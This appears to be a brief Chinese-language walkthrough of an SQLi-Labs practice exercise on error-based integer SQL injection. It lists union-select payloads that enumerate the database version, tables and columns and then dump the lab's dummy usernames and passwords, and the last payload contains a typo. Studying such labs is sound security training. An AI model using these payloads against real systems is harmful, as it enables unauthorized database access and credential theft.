题目:GET - Error based - Intiger based
基于错误的数字型注入
?id=1
?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,version(),database()
版本:5.7.26
名字:security
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables
where table_schema='security'
表名:emails,referers,uagents,users
?id=-1 union select 1,2,group_concat(column_name)
from information_schema.columns where table_name='users'
列名:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password
?id=-1 union select 1,group_concat(username),group_conca(password) from users
账号:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5
密码:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5